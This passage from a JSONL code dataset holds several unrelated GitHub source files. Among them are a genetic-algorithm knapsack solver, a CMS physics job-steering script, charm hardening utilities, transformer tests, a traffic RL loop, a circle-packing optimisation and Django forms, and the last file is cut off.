self.fitness[i]\n #更新精英解池最小值的索引\n index = np.argmin(self.elite_value)\n #更新精英解池的最低门限的索引\n self.elite_min_index = index\n #更新精英解池的最低门限\n self.elite_th = self.elite_value[index]\n\n #分段的自适应交叉变异系数,本文件未使用此方法\n def F_adapt(self,k,f_avg,f_max,x):\n return k if x<=f_avg else k*(f_max-x)/(f_max-f_avg)\n\n\n\ndef GA(W,N,w,v,data_select,res_value):\n \"\"\"\n 遗传算法解决0-1背包问题主函数\n :param W: 背包最大承重\n :param N: 物品总数\n :param w: 每件物品的重量\n :param v: 每件物品的价值\n :param save_fig_path: 样例i的收敛曲线存储路径\n :return: max_value:求解的放入背包的物品最大价值(int);best_solu:放入背包的物品序号(list)\n \"\"\"\n #初始化\n ga = MyGA(W,N,w,v)\n\n for i in range(ga.generation):\n #计算适应度函数\n ga.fitnessF()\n #更新精英解池\n ga.elite_renew()\n #交叉\n ga.cross()\n #变异\n ga.variation()\n #计算适应度函数\n ga.fitnessF()\n #更新精英解池\n ga.elite_renew()\n # #保留最大的价值\n ga.record_best_individual(i)\n #选择\n ga.select()\n #再次计算适应度函数\n ga.fitnessF()\n #找到最大价值\n max_value = np.max(ga.fitness)\n #找到最佳解决方案\n best_solu = ga.population[np.argmax(ga.fitness),:]\n\n #如果比历史最佳高,才保留图片\n if(max_value>res_value):\n #绘图\n plt.clf()\n plt.plot(ga.max_value_pre_gen)\n plt.savefig(\"测试结果/result\"+str(data_select)+\".png\")\n\n return max_value,best_solu\n\n\n\nif __name__ == '__main__':\n data_file = \"实验代码/data.txt\"\n #可以选择的数据种类\n select_data_all = [1,2,3,4,5]\n #终端输入选择的序号\n data_select = int(input(\"请输入读取的文件序号(只输入单个数字即可):\"))\n #终端输入迭代的次数\n times = np.uint64(input(\"请输入迭代的次数(只输入数字即可):\"))\n #判断输入是否合法\n if(data_select not in select_data_all):\n print(\"请输入 1 2 3 4 5 中的一个数字\")\n exit(0)\n #读取文件\n W,N,w,v = read(data_file,data_select)\n #测试文档的路径\n test_path = \"测试结果/result\"+str(data_select)+\".txt\"\n 
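[Editor's note] MyGA.select above walks the cumulative-probability array with a linear scan per draw; a compact standalone equivalent of that roulette-wheel selection, using hypothetical fitness values and np.cumsum plus np.searchsorted in place of the inner loop:

```python
import numpy as np

rng = np.random.default_rng(0)
fitness = np.array([5.0, 1.0, 3.0, 11.0])   # hypothetical fitness values
cum_p = np.cumsum(fitness / fitness.sum())  # cumulative selection probabilities

# Each uniform draw maps to the first index whose cumulative value exceeds it,
# so fitter individuals are selected proportionally more often.
picks = np.searchsorted(cum_p, rng.random(6))
print(picks)
```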
if(os.path.isfile(test_path)):#如果文件存在\n fileHandler = open (test_path, \"r\",encoding ='utf-8')\n #第六行保存着最佳值\n line = fileHandler.readlines()[5]\n #第六行第一个“:”后的数字就是历史最大价值\n res_value = int(line.split(':')[1])\n else:#如果文件不存在,则定义价值为-1\n res_value = -1\n #判断是否要写txt文件的标志位\n new_write = 0\n #开始循环\n for j in range(times):\n #计时开始\n start_time = time.time()\n #开始计算\n max_value,best_solu = GA(W,N,w,v,data_select,res_value)\n #计时结束\n end_time = time.time()\n\n #判断结果准确性\n assert len(best_solu)==N,'物品的件数为%d,给出的方案长度应当与之匹配'%N\n assert best_solu.dot(v)==max_value,'最大价值与给出的方案不匹配'\n assert best_solu.dot(w)<W,'给出的方案超重'\n print(\"装入背包的最大价值:{}\\n\".format(max_value))\n\n #如果大于当前已知的值,则更新txt文档\n if(max_value>res_value):\n #保存参数\n res_value = max_value\n res_solu = best_solu\n res_T = end_time-start_time\n #写入标志位\n new_write=1\n print(\"出现更大的值\")\n #写入txt文件\n if(new_write==1):\n with open(\"测试结果/result\"+str(data_select)+\".txt\",\"w\",encoding ='utf-8') as f:\n f.write(\"背包最大承重:{}\\n\".format(W))\n\n f.write(\"物品件数:{}\\n\".format(N))\n\n f.write(\"每件物品的重量:[\")\n for i in range(N-1):\n f.write(\"{},\".format(w[i]))\n f.write(\"{}]\\n\".format(w[N-1])) \n\n f.write(\"每件物品的价值:[\")\n for i in range(N-1):\n f.write(\"{},\".format(v[i]))\n f.write(\"{}]\\n\".format(v[N-1])) \n\n f.write(\"收敛曲线存储的文件名:\"+\"result\"+str(data_select)+\".png\"+\"\\n\")\n\n f.write(\"装入背包的最大价值:{}\\n\".format(res_value))\n\n f.write(\"装入背包最大价值的最优物品组合:[\")\n for i in range(N-1):\n f.write(\"{},\".format(res_solu[i]))\n f.write(\"{}]\\n\".format(res_solu[N-1])) \n\n f.write(\"测试用时:{:.6f}s\\n\".format(res_T)) \n\n\n","repo_name":"littleBu0210/test","sub_path":"测试代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11640,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"19516028415","text":"#!/usr/bin/env python3\n\nfrom createConfigFiles import *\n\n@timeit\ndef condor_control(original_dir =\"./SubmittedJobs/\" , JECVersions_Data=[\"Autumn18_V4\"], JetLabels=[\"AK4CHS\"], systematics=[\"\", \"PU\", \"JEC\", \"JER\"], internal_option=\"-l\", processes=[], extratext=\"\"):\n count = 0\n list_processes = []\n nProcess = 48\n time_ = 1\n for newJECVersion in JECVersions_Data:\n for newJetLabel in JetLabels:\n for sys in systematics:\n dirs = [\"\", \"up\", \"down\"]\n for dir in dirs:\n if sys == \"\" and dir != \"\":\n continue\n if sys == \"JER\" and dir != \"\":\n continue\n if sys == \"JER\" and dir == \"\":\n dir = \"nominal\"\n path = original_dir+newJECVersion+\"/\"+newJetLabel+extratext+\"/\"+sys+\"/\"+dir+\"/\"\n for sample in sorted(os.listdir(path)):\n if not \".xml\" in sample:\n continue\n if all(not control in sample for control in processes): continue\n if internal_option:\n command = ['sframe_batch.py', internal_option, path+sample]\n else:\n command = ['sframe_batch.py', path+sample]\n command = [path]+command\n list_processes.append(command)\n if internal_option == \"-f\":\n nProcess = 20\n if internal_option == \"\":\n time_ = 0.5\n print(len(list_processes))\n parallelise(list_processes, nProcess, cwd=True, time_=time_)\n\n\n@timeit\ndef delete_workdir(original_dir =\"./SubmittedJobs/\" , JECVersions_Data=[\"Autumn18_V4\", \"Autumn18_V4\"], JetLabels=[\"AK4CHS\", \"AK8Puppi\"], systematics=[\"\", \"PU\", \"JEC\", \"JER\"],extratext=\"\"):\n add_name = original_dir[original_dir.find(\"SubmittedJobs\")+len(\"SubmittedJobs\"):-1]\n for sample in [\"DATA\", \"QCD\"]:\n for newJECVersion in JECVersions_Data:\n for newJetLabel in JetLabels:\n for sys in 
systematics:\n dirs = [\"\", \"up\", \"down\"]\n for dir in dirs:\n if sys == \"\" and dir != \"\":\n continue\n if sys == \"JER\" and dir != \"\":\n continue\n if sys == \"JER\" and dir == \"\":\n \t dir = \"nominal\"\n if 'PS' in sys:\n if 'DATA'==sample:\n continue\n path = userPathSframeOutput+\"/\"+newJECVersion+\"/\"+newJetLabel+extratext+\"/\"+sys+\"/\"+dir+\"/\"\n if os.path.isdir(path):\n for workdir in sorted(os.listdir(path)):\n if \"workdir\" in workdir:\n cmd = \"rm -fr %s\" % (path+workdir)\n a = os.system(cmd)\n print(cmd)\n path = original_dir+newJECVersion+\"/\"+newJetLabel+extratext+\"/\"+sys+\"/\"+dir+\"/\"\n if os.path.isdir(path):\n for workdir in sorted(os.listdir(path)):\n if \"workdir\" in workdir:\n cmd = \"rm -fr %s\" % (path+workdir)\n a = os.system(cmd)\n\n\n\n\ndef main_program(option=\"\", internal_option=\"\", study=\"Standard\", processes=[], others=[], JECVersions_Data=[], JECVersions_MC=[], JetLabels=[], systematics=[], original_dir=\"./SubmittedJobs/\", original_file=\"JER2018.xml\", year=\"2018\", isMB=False, test_trigger=False, isThreshold=False, isLowPt=False, isECAL=False, extratext=\"\"):\n if option == \"new\":\n createConfigFiles(study, processes, others, JECVersions_Data, JECVersions_MC, JetLabels, systematics, original_dir, original_file, outdir, year, isMB, test_trigger, isThreshold,isLowPt,isECAL,extratext)\n elif option == \"remove\" or option == \"delete\":\n delete_workdir(original_dir, JECVersions_Data, JetLabels, systematics, extratext)\n else:\n condor_control(original_dir, JECVersions_Data, JetLabels, systematics, internal_option, processes, extratext)\n\n\n\n##################################################\n# #\n# MAIN Program #\n# #\n##################################################\n\nUSER = os.environ[\"USER\"]\n\ntry:\n option = sys.argv[1]\nexcept:\n option = \"\"\n\nif option == \"resubmit\":\n internal_option = \"-r\"\nelif option == \"submit\":\n internal_option = \"-s\"\nelif option == \"add\" or option == \"merge\":\n internal_option = \"-f\"\nelif option == \"list\":\n internal_option = \"-l\"\nelif option == \"new\":\n internal_option = \"\"\nelif option == \"remove\" or option == \"delete\":\n internal_option = \"\"\nelif option == \"split\":\n internal_option = \"\"\nelse:\n internal_option = \"\"\n\n\nQCD_process= []\nData_process= 
[]\n\nQCD_process.append(\"QCDHT50to100_2018\")\nQCD_process.append(\"QCDHT100to200_2018\")\nQCD_process.append(\"QCDHT200to300_2018\")\nQCD_process.append(\"QCDHT300to500_2018\")\nQCD_process.append(\"QCDHT500to700_2018\")\nQCD_process.append(\"QCDHT700to1000_2018\")\nQCD_process.append(\"QCDHT1000to1500_2018\")\nQCD_process.append(\"QCDHT1500to2000_2018\")\nQCD_process.append(\"QCDHT2000toInf_2018\")\nData_process.append(\"DATA_RunA_2018\")\nData_process.append(\"DATA_RunB_2018\")\nData_process.append(\"DATA_RunC_2018\")\nData_process.append(\"DATA_RunD_2018\")\n\nQCD_process.append(\"QCDHT50to100_UL16preVFP\")\nQCD_process.append(\"QCDHT100to200_UL16preVFP\")\nQCD_process.append(\"QCDHT200to300_UL16preVFP\")\nQCD_process.append(\"QCDHT300to500_UL16preVFP\")\nQCD_process.append(\"QCDHT500to700_UL16preVFP\")\nQCD_process.append(\"QCDHT700to1000_UL16preVFP\")\nQCD_process.append(\"QCDHT1000to1500_UL16preVFP\")\nQCD_process.append(\"QCDHT1500to2000_UL16preVFP\")\nQCD_process.append(\"QCDHT2000toInf_UL16preVFP\")\nQCD_process.append(\"QCDHT50to100_UL16postVFP\")\nQCD_process.append(\"QCDHT100to200_UL16postVFP\")\nQCD_process.append(\"QCDHT200to300_UL16postVFP\")\nQCD_process.append(\"QCDHT300to500_UL16postVFP\")\nQCD_process.append(\"QCDHT500to700_UL16postVFP\")\nQCD_process.append(\"QCDHT700to1000_UL16postVFP\")\nQCD_process.append(\"QCDHT1000to1500_UL16postVFP\")\nQCD_process.append(\"QCDHT1500to2000_UL16postVFP\")\nQCD_process.append(\"QCDHT2000toInf_UL16postVFP\")\nData_process.append(\"DATA_RunB_UL16preVFP\")\nData_process.append(\"DATA_RunC_UL16preVFP\")\nData_process.append(\"DATA_RunD_UL16preVFP\")\nData_process.append(\"DATA_RunE_UL16preVFP\")\nData_process.append(\"DATA_RunF_UL16preVFP\")\nData_process.append(\"DATA_RunF_UL16postVFP\")\nData_process.append(\"DATA_RunG_UL16postVFP\")\nData_process.append(\"DATA_RunH_UL16postVFP\")\n\n\nQCD_process.append(\"QCDHT50to100_UL17\")\nQCD_process.append(\"QCDHT100to200_UL17\")\nQCD_process.append(\"QCDHT200to300_UL17\")\nQCD_process.append(\"QCDHT300to500_UL17\")\nQCD_process.append(\"QCDHT500to700_UL17\")\nQCD_process.append(\"QCDHT700to1000_UL17\")\nQCD_process.append(\"QCDHT1000to1500_UL17\")\nQCD_process.append(\"QCDHT1500to2000_UL17\")\nQCD_process.append(\"QCDHT2000toInf_UL17\")\nQCD_process.append(\"QCDPt15to30_UL17\")\nQCD_process.append(\"QCDPt30to50_UL17\")\nQCD_process.append(\"QCDPt50to80_UL17\")\nQCD_process.append(\"QCDPt80to120_UL17\")\nQCD_process.append(\"QCDPt120to170_UL17\")\nQCD_process.append(\"QCDPt170to300_UL17\")\nQCD_process.append(\"QCDPt300to470_UL17\")\nQCD_process.append(\"QCDPt470to600_UL17\")\nQCD_process.append(\"QCDPt600to800_UL17\")\nQCD_process.append(\"QCDPt800to1000_UL17\")\nQCD_process.append(\"QCDPt1000to1400_UL17\")\nQCD_process.append(\"QCDPt1400to1800_UL17\")\nQCD_process.append(\"QCDPt1800to2400_UL17\")\nQCD_process.append(\"QCDPt2400to3200_UL17\")\nQCD_process.append(\"QCDPt3200toInf_UL17\")\nData_process.append(\"DATA_RunB_UL17\")\nData_process.append(\"DATA_RunC_UL17\")\nData_process.append(\"DATA_RunD_UL17\")\nData_process.append(\"DATA_RunE_UL17\")\nData_process.append(\"DATA_RunF_UL17\")\n\n\n\nQCD_process.append(\"QCDHT50to100_UL18\")\nQCD_process.append(\"QCDHT100to200_UL18\")\nQCD_process.append(\"QCDHT200to300_UL18\")\nQCD_process.append(\"QCDHT300to500_UL18\")\nQCD_process.append(\"QCDHT500to700_UL18\")\nQCD_process.append(\"QCDHT700to1000_UL18\")\nQCD_process.append(\"QCDHT1000to1500_UL18\")\nQCD_process.append(\"QCDHT1500to2000_UL18\")\nQCD_process.append(\"QCDHT2000toInf_UL18\")\nData
_process.append(\"DATA_RunA_UL18\")\nData_process.append(\"DATA_RunB_UL18\")\nData_process.append(\"DATA_RunC_UL18\")\nData_process.append(\"DATA_RunD_UL18\")\n\n\n# JECVersions_Data = [\"Autumn18_V4\"]\n# JetLabels = [\"AK4CHS\", \"AK8Puppi\"]\n# systematics = [\"\", \"PU\", \"JEC\", \"JER\"]\n\n# year = \"2018\"\n# year = \"UL16preVFP\"\n# year = \"UL16postVFP\"\nyear = \"UL17\"\n# year = \"UL18\"\n\n\nstudies = []\n# studies.append(\"Standard\")\n# studies.append(\"L1L2Residual\")\n# studies.append(\"L1L2\")\n# studies.append(\"eta_JER\")\nstudies.append(\"eta_common\")\n# studies.append(\"eta_common\")\n# studies.append(\"eta_L2R\")\n# studies.append(\"eta_narrow\")\n#studies.append(\"eta_simple\")\n\nprint(\"Running for: \", studies)\ntime.sleep(2)\n\n# outdir = \"DiJetJERC_DiJetHLT\"\noutdir = \"DiJetJERC_DiJetHLT\"\noriginal_file = outdir+\".xml\"\noriginal_dir_ = os.getcwd()\n\n\n# QCDSamples = [\"QCDPt\",\"QCDHT\", \"DATA\"]\n# QCDSamples = [\"QCDHT\", \"DATA\"]\n# QCDSamples = [\"DATA\"]\nQCDSamples = [\"QCDHT\"]\nprocesses = list(filter( lambda sample: year in sample and any(QCD in sample for QCD in QCDSamples) , QCD_process+Data_process))\nothers = list(set(QCD_process+Data_process)-set(processes))\n\nJECVersions_Data = {}\nJECVersions_MC = {}\n\nJECVersions_Data[\"UL16preVFP\"] = [\"Summer20UL16APV_V2\"]\nJECVersions_MC[\"UL16preVFP\"] = [\"Summer20UL16APV_V2\"]\nJECVersions_Data[\"UL16postVFP\"] = [\"Summer20UL16_V2\"]\nJECVersions_MC[\"UL16postVFP\"] = [\"Summer20UL16_V2\"]\nJECVersions_Data[\"UL17\"] = [\"Summer20UL17_V2\"]\nJECVersions_MC[\"UL17\"] = [\"Summer20UL17_V2\"]\nJECVersions_Data[\"UL18\"] = [\"Summer20UL18_V2\"]\nJECVersions_MC[\"UL18\"] = [\"Summer20UL18_V2\"]\n# JECVersions_Data[\"UL18\"] = [\"Summer20UL18_V1\"]\n# JECVersions_MC[\"UL18\"] = [\"Summer20UL18_V1\"]\n\n# JECVersions_Data[\"UL18\"] = [\"Summer19UL18_V5\"]\n# JECVersions_MC[\"UL18\"] = [\"Summer19UL18_V5\"]\n\n# JetLabels = [\"AK4CHS\", \"AK4Puppi\", \"AK8CHS\", \"AK8Puppi\"]\n# JetLabels = [\"AK4Puppi_v11\"]\nJetLabels = [\"AK4Puppi\"]\n# JetLabels = [\"AK4CHS\", \"AK4Puppi\"]\n# JetLabels = [\"AK8Puppi\", \"AK4Puppi\"]\n# JetLabels = [ \"AK8Puppi\"]\n# systematics = [\"\", \"PU\", \"JEC\", \"JER\"]\n# systematics = [\"\", \"PU\", \"JEC\", \"Prefire\"]\n# systematics = [\"PU\", \"JEC\", \"Prefire\", \"PS\"]\n#systematics = [\"PU\", \"JEC\"]\n# systematics = [\"PS\"]\nsystematics = [\"\"]\n\nprint(year,studies, QCDSamples, JECVersions_Data[year], JetLabels, systematics)\n\nfor study in studies:\n\n userPathSframeOutput=\"/nfs/dust/cms/user/\"+USER+\"/sframe_all/\"+outdir+\"/\"+year+\"/\"+study+\"/\"\n\n original_dir = original_dir_\n original_dir += \"/SubmittedJobs/\"+year+\"/\"+study+\"/\"\n\n main_program(option, internal_option, study, processes, others, JECVersions_Data[year], JECVersions_MC[year], JetLabels, systematics, original_dir, original_file, year)\n","repo_name":"UHH2/DiJetJERC","sub_path":"conf/steer.py","file_name":"steer.py","file_ext":"py","file_size_in_byte":11208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7860430493","text":"\nimport math\nimport config\n\nclass Object:\n def __init__(self):\n self.pos = [1.0,0.0]\n self.v = [1.0,0.0]\n self.mass = 0\n self.speed = 10\n self.renderpos = [0,0]\n self.w_2 = config.screen_width/2\n self.h_2 = config.screen_height/2\n\n def norm(self,x):\n return math.sqrt(x[0]**2 + x[1]**2)\n\n def add_vec(self, a, b):\n return [a[0]+b[0],a[1]+b[1]]\n\n def sub_vec(self,a,b):\n 
return [a[0] - b[0], a[1] - b[1]]\n\n def multiply(self,cons,x):\n return [cons*x[0],cons*x[1]]\n\n def dot(self,a,b):\n return a[0]*b[0]+a[1]*b[1]\n\n def angle_2vec(self, a, b):\n dot = self.dot(a,b)\n mag_a = self.norm(a)\n mag_b = self.norm(b)\n t = dot / (mag_a * mag_b)\n if(t>1):\n return 0\n return math.acos(t)\n\n def renderPosition(self,ref,):\n self.renderpos = [self.pos[0] - ref[0],self.pos[1] - ref[1]]\n self.renderpos[0] += self.w_2\n self.renderpos[1] += self.h_2\n\n def unit(self, x):\n n = self.norm(x)\n if n!=0:\n return [x[0]/n,x[1]/n]\n else:\n return [0,0]\n\n def calculate_angle(self,x):\n n = self.norm(x)\n t = math.atan(x[1]/x[0])\n a = math.fabs(math.degrees(t))\n if x[0] >= 0:\n if x[1]>=0:\n return a\n else:\n return -a\n else:\n if x[1]>=0:\n return 180-a\n else:\n return a-180\n\n","repo_name":"rushi1222/skywars","sub_path":"source/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5473612403","text":"import glob\nimport grp\nimport os\nimport pwd\nimport six\nimport yaml\n\nfrom charmhelpers.core.hookenv import (\n log,\n DEBUG,\n INFO,\n WARNING,\n ERROR,\n)\n\n\n# Global settings cache. Since each hook fire entails a fresh module import it\n# is safe to hold this in memory and not risk missing config changes (since\n# they will result in a new hook fire and thus re-import).\n__SETTINGS__ = {}\n\n\ndef _get_defaults(modules):\n \"\"\"Load the default config for the provided modules.\n\n :param modules: stack modules config defaults to lookup.\n :returns: modules default config dictionary.\n \"\"\"\n default = os.path.join(os.path.dirname(__file__),\n 'defaults/%s.yaml' % (modules))\n return yaml.safe_load(open(default))\n\n\ndef _get_schema(modules):\n \"\"\"Load the config schema for the provided modules.\n\n NOTE: this schema is intended to have 1-1 relationship with they keys in\n the default config and is used a means to verify valid overrides provided\n by the user.\n\n :param modules: stack modules config schema to lookup.\n :returns: modules default schema dictionary.\n \"\"\"\n schema = os.path.join(os.path.dirname(__file__),\n 'defaults/%s.yaml.schema' % (modules))\n return yaml.safe_load(open(schema))\n\n\ndef _get_user_provided_overrides(modules):\n \"\"\"Load user-provided config overrides.\n\n :param modules: stack modules to lookup in user overrides yaml file.\n :returns: overrides dictionary.\n \"\"\"\n overrides = os.path.join(os.environ['JUJU_CHARM_DIR'],\n 'hardening.yaml')\n if os.path.exists(overrides):\n log(\"Found user-provided config overrides file '%s'\" %\n (overrides), level=DEBUG)\n settings = yaml.safe_load(open(overrides))\n if settings and settings.get(modules):\n log(\"Applying '%s' overrides\" % (modules), level=DEBUG)\n return settings.get(modules)\n\n log(\"No overrides found for '%s'\" % (modules), level=DEBUG)\n else:\n log(\"No hardening config overrides file '%s' found in charm \"\n \"root dir\" % (overrides), level=DEBUG)\n\n return {}\n\n\ndef _apply_overrides(settings, overrides, schema):\n \"\"\"Get overrides config overlayed onto modules defaults.\n\n :param modules: require stack modules config.\n :returns: dictionary of modules config with user overrides applied.\n \"\"\"\n if overrides:\n for k, v in six.iteritems(overrides):\n if k in schema:\n if schema[k] is None:\n settings[k] = v\n elif type(schema[k]) is dict:\n settings[k] = _apply_overrides(settings[k], overrides[k],\n 
schema[k])\n else:\n raise Exception(\"Unexpected type found in schema '%s'\" %\n type(schema[k]), level=ERROR)\n else:\n log(\"Unknown override key '%s' - ignoring\" % (k), level=INFO)\n\n return settings\n\n\ndef get_settings(modules):\n global __SETTINGS__\n if modules in __SETTINGS__:\n return __SETTINGS__[modules]\n\n schema = _get_schema(modules)\n settings = _get_defaults(modules)\n overrides = _get_user_provided_overrides(modules)\n __SETTINGS__[modules] = _apply_overrides(settings, overrides, schema)\n return __SETTINGS__[modules]\n\n\ndef ensure_permissions(path, user, group, permissions, maxdepth=-1):\n \"\"\"Ensure permissions for path.\n\n If path is a file, apply to file and return. If path is a directory,\n apply recursively (if required) to directory contents and return.\n\n :param user: user name\n :param group: group name\n :param permissions: octal permissions\n :param maxdepth: maximum recursion depth. A negative maxdepth allows\n infinite recursion and maxdepth=0 means no recursion.\n :returns: None\n \"\"\"\n if not os.path.exists(path):\n log(\"File '%s' does not exist - cannot set permissions\" % (path),\n level=WARNING)\n return\n\n _user = pwd.getpwnam(user)\n os.chown(path, _user.pw_uid, grp.getgrnam(group).gr_gid)\n os.chmod(path, permissions)\n\n if maxdepth == 0:\n log(\"Max recursion depth reached - skipping further recursion\",\n level=DEBUG)\n return\n elif maxdepth > 0:\n maxdepth -= 1\n\n if os.path.isdir(path):\n contents = glob.glob(\"%s/*\" % (path))\n for c in contents:\n ensure_permissions(c, user=user, group=group,\n permissions=permissions, maxdepth=maxdepth)\n","repo_name":"ChrisMacNaughton/charms.hardening","sub_path":"charms_hardening/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"39475502838","text":"import pytest\nfrom py_backwards.transformers.return_from_generator import ReturnFromGeneratorTransformer\n\n\n@pytest.mark.parametrize('before, after', [\n ('''\ndef fn():\n yield 1\n return 5\n ''', '''\ndef fn():\n (yield 1)\n _py_backwards_exc_0 = StopIteration()\n _py_backwards_exc_0.value = 5\n raise _py_backwards_exc_0\n '''),\n ('''\ndef fn():\n if True:\n x = yield from [1]\n return 5\n ''', '''\ndef fn():\n if True:\n x = (yield from [1])\n _py_backwards_exc_0 = StopIteration()\n _py_backwards_exc_0.value = 5\n raise _py_backwards_exc_0\n ''')])\ndef test_transform(transform, ast, before, after):\n code = transform(ReturnFromGeneratorTransformer, before)\n assert ast(code) == ast(after)\n\n\nget_value = '''\ngen = fn()\nnext(gen)\nval = None\ntry:\n next(gen)\nexcept StopIteration as e:\n val = e.value\nval\n'''\n\n\n@pytest.mark.parametrize('code, result', [\n ('''\ndef fn():\n yield 1\n return 5\n{}\n '''.format(get_value), 5),\n ('''\ndef fn():\n yield from [1]\n return 6\n{}\n '''.format(get_value), 6),\n ('''\ndef fn():\n x = yield 1\n return 7\n{}\n '''.format(get_value), 7),\n ('''\ndef fn():\n x = yield from [1]\n return 8\n{}\n '''.format(get_value), 8)])\ndef test_run(run_transformed, code, result):\n assert run_transformed(ReturnFromGeneratorTransformer, code) == result\n","repo_name":"nvbn/py-backwards","sub_path":"tests/transformers/test_return_from_generator.py","file_name":"test_return_from_generator.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"22"} +{"seq_id":"32733461773","text":"from env 
import TrafficEnv\nfrom rl import DDPG\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nMAX_EPOCH = 500\nMAX_EVENT = 100\n\nenv = TrafficEnv()\ns_dim = env.state_dim\na_dim = env.action_dim\na_bound = env.action_bound\nr_dim = env.reward_dim\n\nrl = DDPG(a_dim, s_dim, r_dim, a_bound)\n\n\ndef save_result(d, id):\n data_dict = {'FOT_Control.Speed': d[:, 0],\n 'IMU.Accel_X': d[:, 1],\n 'SMS.X_Velocity_T0': d[:, 2],\n 'SMS.X_RANGE_T0': d[:, 3]}\n d_frame = pd.DataFrame(data_dict)\n d_frame.to_csv('./data/result_' + str(id) + '.csv', sep=',')\n\n\ndef plot(data1, data2):\n plt.figure(1)\n plt.subplot(221)\n p11 = plt.plot(data1[:, 0], color='blue')\n p12 = plt.plot(data2[:, 0], color='red')\n plt.gca().add_artist(plt.legend([p11, p12], ['Pred', 'True']))\n plt.title('Speed')\n\n plt.subplot(222)\n p21 = plt.plot(data1[:, 1], color='blue')\n p22 = plt.plot(data2[:, 1], color='red')\n plt.gca().add_artist(plt.legend([p21, p22], ['Pred', 'True']))\n plt.title('Accel')\n\n plt.subplot(223)\n p31 = plt.plot(data1[:, 2], color='blue')\n p32 = plt.plot(data2[:, 2], color='red')\n plt.gca().add_artist(plt.legend([p31, p32], ['Pred', 'True']))\n plt.title('R-Speed')\n\n plt.subplot(224)\n p41 = plt.plot(data1[:, 3], color='blue')\n p42 = plt.plot(data2[:, 3], color='red')\n plt.gca().add_artist(plt.legend([p41, p42], ['Pred', 'True']))\n plt.title('Dist')\n plt.show()\n\n\nfor i in range(MAX_EPOCH):\n s = env.reset()\n done = False\n is_end = False\n while not is_end:\n a = rl.choose_action(s)\n s_, r, done, info = env.step(a)\n print('a: %f, r: %s ' % (a, r))\n print('v: %f, a: %s, rv: %s dist: %s' % (s_[0], s_[1], s_[2], s_[3]))\n if info['is_crash'] is False:\n rl.store_transition(s, a, r, s_)\n\n if done:\n data = rl.get_memory()\n true_data = np.array(env.get_true_states())\n save_result(data, info['EventId'])\n plot(data, true_data)\n\n rl.learn()\n s = env.reset()\n done = False\n print('===================Reset Now=====================')\n\n else:\n s = s_\n\n\n","repo_name":"herrsechs/TrafficRL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"810779859","text":"__author__ = 'Xinyue'\nimport cvxpy as cvx\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport dccp\nfrom cvxpy import Problem, Variable, Minimize\n\nif __name__ == '__main__':\n np.random.seed(0)\n n = 10\n r = np.linspace(1, 5, n)\n\n c = Variable((n, 2))\n constr = []\n for i in range(n-1):\n for j in range(i+1, n):\n constr.append(cvx.norm(cvx.vec(c[i, :]-c[j, :]), 2) >= r[i]+r[j])\n\n # prob = Problem(\n # Minimize(\n # cvx.max(\n # cvx.max(cvx.abs(c), axis=1) + r # max dim = c_max + r\n # )\n # ),\n # constr\n # )\n\n prob = Problem(\n Minimize(\n cvx.max(cvx.abs(c[:, 0]) + r) +\n cvx.max(cvx.abs(c[:, 1]) + r)\n ),\n constr\n )\n\n print(prob.is_dcp(), prob.is_dcp())\n print(dccp.is_dccp(prob))\n prob.solve(method='dccp', solver='ECOS', ep=1e-2, max_slack=1e-2, verbose=True)\n\n l = cvx.max(cvx.max(cvx.abs(c), axis=1)+r).value*2\n pi = np.pi\n ratio = pi*cvx.sum(cvx.square(r)).value/cvx.square(l).value\n print(\"ratio =\", ratio)\n\n # plot\n plt.figure(figsize=(5, 5))\n circ = np.linspace(0, 2*pi)\n x_border = [-l/2, l/2, l/2, -l/2, -l/2]\n y_border = [-l/2, -l/2, l/2, l/2, -l/2]\n for i in range(n):\n plt.plot(c[i, 0].value+r[i]*np.cos(circ), c[i, 1].value+r[i]*np.sin(circ),'b')\n plt.plot(x_border, y_border, 'g')\n plt.axes().set_aspect('equal')\n 
plt.xlim([-l/2, l/2])\n plt.ylim([-l/2, l/2])\n plt.show()\n\n","repo_name":"psavine42/juststuff","sub_path":"spec/scripts/circle_pack_cvx.py","file_name":"circle_pack_cvx.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36043980305","text":"from django import forms\nfrom .models import Ticket, Registro\n\nclass TicketForm(forms.ModelForm):\n class Meta:\n model = Ticket\n fields = ['asunto', 'descripcion', 'lugar']\n widgets = {\n 'asunto': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'What happened?'}),\n 'descripcion': forms.Textarea(attrs={'class': 'form-control','placeholder' : 'Can you give us more details?','style':'height: 100px'}),\n 'lugar': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Where did the incident occur?'}),\n }\nclass RegistroForm(forms.ModelForm):\n class Meta:\n model = Registro\n fields = ['estado','comment_estado']\n","repo_name":"ldxsoria/mti","sub_path":"myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"26853396245","text":"import asyncio\nimport time\nfrom .defaults import DEFAULT_CLIENT_PORT\nfrom .protocol import _SiriDBProtocol\nfrom .protomap import CPROTO_REQ_QUERY\nfrom .protomap import CPROTO_REQ_INSERT\nfrom .protomap import CPROTO_REQ_REGISTER_SERVER\nfrom .protomap import CPROTO_REQ_PING\nfrom .protomap import FILE_MAP\nfrom .constants import SECOND\nfrom .constants import MICROSECOND\nfrom .constants import MILLISECOND\nfrom .constants import NANOSECOND\nfrom .logging import logger as logging\n\n\nclass SiriDBConnection():\n\n def __init__(self,\n username,\n password,\n dbname,\n 